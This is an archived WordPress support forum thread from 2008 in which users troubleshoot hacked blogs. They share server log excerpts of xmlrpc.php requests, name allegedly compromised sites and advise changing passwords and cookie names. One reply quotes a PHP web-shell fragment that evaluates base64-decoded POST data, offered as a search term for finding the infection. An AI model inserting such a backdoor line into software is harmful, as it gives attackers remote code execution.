Title: Hacking Problem Last modified: August 19, 2016 --- # Hacking Problem * [fattony69](https://wordpress.org/support/users/fattony69/) * (@fattony69) * [18 years, 3 months ago](https://wordpress.org/support/topic/hacking-problem-1/) * I have three blogs that I own. All of them are protected with the knowledge I have. .htaccess, encrypted password, etc…but I have been getting hacked lately. All of the sites are updated and I have check the plugins and all are updated and have no problems…so what is the caused? Viewing 15 replies - 1 through 15 (of 15 total) * [vrocks](https://wordpress.org/support/users/vrocks/) * (@vrocks) * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703504) * I keep getting this: * protected.com/logs/access.log:194.110.162.23 – – [24/Mar/2008:01:46:27 -0400]“ POST /xmlrpc.php?3e97459f56c3c68f=61e9790d63df6a04 HTTP/1.1” 200 25 “-” “Mozilla/ 5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3” protected.com/logs/access.log:194.110.162.23 – – [24/Mar/2008:01:46:28 -0400]“ POST /xmlrpc.php?3e97459f56c3c68f=61e9790d63df6a04 HTTP/1.1” 200 25 “-” “Mozilla/ 5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3” protected.com/logs/access.log:64.136.26.226 – – [24/Mar/2008:02:38:22 -0400] “ GET /xmlrpc.php?rsd HTTP/1.1” 200 638 “[http://www.protected.com/page/3”](http://www.protected.com/page/3”);“ Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)” protected. com/logs/access.log:64.136.26.226 – – [24/Mar/2008:02:38:22 -0400] “GET /xmlrpc. php HTTP/1.1” 200 54 “[http://www.protected.com/page/3”](http://www.protected.com/page/3”);“ Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)” protected. com/logs/access.log:64.136.26.226 – – [24/Mar/2008:02:52:18 -0400] “GET /xmlrpc. php HTTP/1.1” 200 54 “[http://www.protected.com/page/images/protected.jpg”](http://www.protected.com/page/images/protected.jpg”);“ Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)” protected. com/logs/access.log:64.136.26.226 – – [24/Mar/2008:02:52:18 -0400] “GET /xmlrpc. php?rsd HTTP/1.1” 200 638 “[http://www.protected.com/page/images/protected.jpg”](http://www.protected.com/page/images/protected.jpg”);“ Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)” protected. com/logs/access.log:78.151.173.179 – – [24/Mar/2008:05:51:43 -0400] “GET /xmlrpc. php HTTP/1.1” 200 54 “[http://www.protected.com/”](http://www.protected.com/”);“ Dummy/1.00 (Windows NT 5.1; U; en-us)” protected.com/logs/access.log:78.151.173.179––[ 24/Mar/2008:05:51:46 -0400] “GET /xmlrpc.php?rsd HTTP/1.1” 200 638 “[http://www.protected.com/”](http://www.protected.com/”);“ Dummy/1.00 (Windows NT 5.1; U; en-us)” protected.com/logs/access.log:77.91.224.14––[ 24/Mar/2008:06:00:23 -0400] “GET /xmlrpc.php HTTP/1.1” 200 54 “-” “WebAlta Crawler/ 2.0 ([http://www.webalta.net/ru/about_webmaster.html](http://www.webalta.net/ru/about_webmaster.html))( Windows; U; Windows NT 5.1; ru-RU)” protected.com/logs/access.log:77.91.224.14––[ 24/Mar/2008:06:03:01 -0400] “GET /xmlrpc.php?rsd HTTP/1.1” 200 638 “-” “WebAlta Crawler/2.0 ([http://www.webalta.net/ru/about_webmaster.html](http://www.webalta.net/ru/about_webmaster.html))( Windows; U; Windows NT 5.1; ru-RU)” * [vrocks](https://wordpress.org/support/users/vrocks/) * (@vrocks) * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703505) * Once that appears in my logs I have several files with code injected and all of my files are touched to the same date. * [http://gordon.dewis.ca/2008/01/06/expunging-the-wordpressnetin-spam-injection-hijack/](http://gordon.dewis.ca/2008/01/06/expunging-the-wordpressnetin-spam-injection-hijack/) * Good explanation… * Google for: * eval(base64_decode($_POST[‘file’])); exit; * Apparently XMLRPC is hackable! * Moderator [Samuel Wood (Otto)](https://wordpress.org/support/users/otto42/) * (@otto42) * WordPress.org Admin * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703506) * VRocKs: There are no known exploits for WordPress 2.3.3. Are you running the latest version? Are you *SURE*? * Furthermore, the log you posted is showing somebody running an exploit, not somebody installing one. That exploit could have been added to your site through any of half a dozen other ways. * We need more information to confirm that this is a WordPress issue. Nothing you have given us confirms that or shows any sort of a clue on how you were hacked. * In other words, telling us WordPress has a problem is useless to us unless you can also tell us where the problem is. * [whooami](https://wordpress.org/support/users/whooami/) * (@whooami) * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703507) * there is also no indication this is primarily w WP problem, and not something underlying. * [http://www.kidscoop.org/](http://www.kidscoop.org/) is exploited and it’s inside their gallery installation. * [http://www.larmac.com.au/](http://www.larmac.com.au/) also popped up. * [http://www.lentini.co.uk](http://www.lentini.co.uk) is hacked. Ive emailed him; notice the old version? * [http://www.jtechnica.com](http://www.jtechnica.com) is hacked, with the hqc. php bits, even. And its not a wordpress install. * [http://www.uneditedspirituality.ca/](http://www.uneditedspirituality.ca/) is hacked with the hcq.php, and that’s Joomla. * [http://www.spinlabs.ca/](http://www.spinlabs.ca/) is hacked and its an older version. Not real old, but still. And somehow, in a case of “hahah, you reap what you sow”, this person has *apparantly* actively disabled the upgrade notices: * [http://www.spinlabs.ca/wp-content/plugins/disable-wordpress-core-update/](http://www.spinlabs.ca/wp-content/plugins/disable-wordpress-core-update/) * [http://jeremyduncan.ca/](http://jeremyduncan.ca/) is hacked, and the redirect to the spam content is able to be called right off his index.php page. * [http://www.hansdreesen.com/](http://www.hansdreesen.com/) = hacked. * [http://www.thinkerlabs.ca/jonmanafo](http://www.thinkerlabs.ca/jonmanafo) is hacked. another old version; i emailed him.. no reply. * Those are just a few of the sites that popped up in the $_POST logging i have set up on one site that I am watching. Oddly enough, even over the course of a few days, the IP never changed: 216.246.56.146 * [vrocks](https://wordpress.org/support/users/vrocks/) * (@vrocks) * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703508) * I setup a honeypot for them… * I also put on an aluminum foil hat… * I will let you know… * [w00t](https://wordpress.org/support/users/w00t/) * (@w00t) * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703509) * it does appear like a wordpress problem. I have been having this lately–for the past few weeks. Look here: * [http://mraziz.com/personal/2008/03/16/post-spam/](http://mraziz.com/personal/2008/03/16/post-spam/) * this same post mentioned above is injected with spam, no matter how many times i edit the post and remove it it gets back, and comments are turned off too. I thought it was a problem with my host and I was hacked so I changed my host to a new one, same problem is happneing. I’m using 2.3.3 and I’m sure about it. * [Jeremy Clark](https://wordpress.org/support/users/jeremyclark13/) * (@jeremyclark13) * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703510) * Do you have any logs of how they’re doing it. * [w00t](https://wordpress.org/support/users/w00t/) * (@w00t) * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703511) * which logs do you need? or which file? * [whooami](https://wordpress.org/support/users/whooami/) * (@whooami) * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703512) * I can tell you how theyre doing it. we saw it in the $_POST logging. Donncha was made aware of it as well. * Theyre calling a file behind wp-admin/ It cannot be replicated unless you are logged in as an admin. Not logged in, then you are properly redirected to login. And a simple subscriber acct, if you are logged in as such, is told they dont have the necessary permissions. * The consensus was either it was a cookie or a password thing. * I am NOT sharing the file name, it serves no purpose for me to do so. * Moderator [Samuel Wood (Otto)](https://wordpress.org/support/users/otto42/) * (@otto42) * WordPress.org Admin * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703513) * Well, how are they logging in then? I mean, I could login to your blog as you if I could get ahold of your cookies, but I don’t quite see how they’re getting those. * [whooami](https://wordpress.org/support/users/whooami/) * (@whooami) * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703514) * that was Donncha’s reaction, exactly, otto. Ive seen an attempted sql exploit that attempts to get the admin password but it fails on a wordpress 2.3.3 install, and as far as I could see, its old. * There are 2 things going on. * 1. the wp-content/1 thing .. that attack is actually visible in your Apache logs. They use a core file behind wp-admin/ to create a rootshell on a file that already exists (that ought to give it away for you, otto) * 2. The insertions into actual posts. Thats yet another file behind wp-admin/ * Both of these require you to be logged in, the _noonce fails without a valid admin login. * I have examples of both of those, if youre interested Otto. Just drop me an email. * [w00t](https://wordpress.org/support/users/w00t/) * (@w00t) * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703515) * So what shall I do to resolve this? * [whooami](https://wordpress.org/support/users/whooami/) * (@whooami) * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703516) * start by changing your admin password. If you changed it once, change it again. And I dont care what anyone says to the contrary, I would change the names of your cookies. Someone I helped mentioned seeing session variables inside on of their wordpress tables, I havent seen that anywhere though. If you see any, I would clear em. * If you want to be a guinea pig and try to help figuring out the problem, send me an email and we can set up some logging. Its takes 2 minutes. * [w00t](https://wordpress.org/support/users/w00t/) * (@w00t) * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703517) * Anyway, if you as you say they are logging in as admin, why is it only happening to the most recent post only? If i were a spammer and I obtained admin access I would spam/alter all the posts and even mass post spam everywhere. * [whooami](https://wordpress.org/support/users/whooami/) * (@whooami) * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703518) * _Anyway, if you as you say they are logging …_ * anyway? * I could answer your question by showing you the $_POST variables, I’m not going to. * I’ll assume by your lack of reply to my offer that you arent interested in actually seeing all of this for yourself, which btw, would have negated the necessity for such a question. Therefore, I wish you the best, and you may consider my offer rescinded. Viewing 15 replies - 1 through 15 (of 15 total) The topic ‘Hacking Problem’ is closed to new replies. ## Tags * [hacking](https://wordpress.org/support/topic-tag/hacking/) * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/) * 15 replies * 6 participants * Last reply from: [whooami](https://wordpress.org/support/users/whooami/) * Last activity: [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703518) * Status: not resolved ## Topics ### Topics with no replies ### Non-support topics ### Resolved topics ### Unresolved topics ### All topics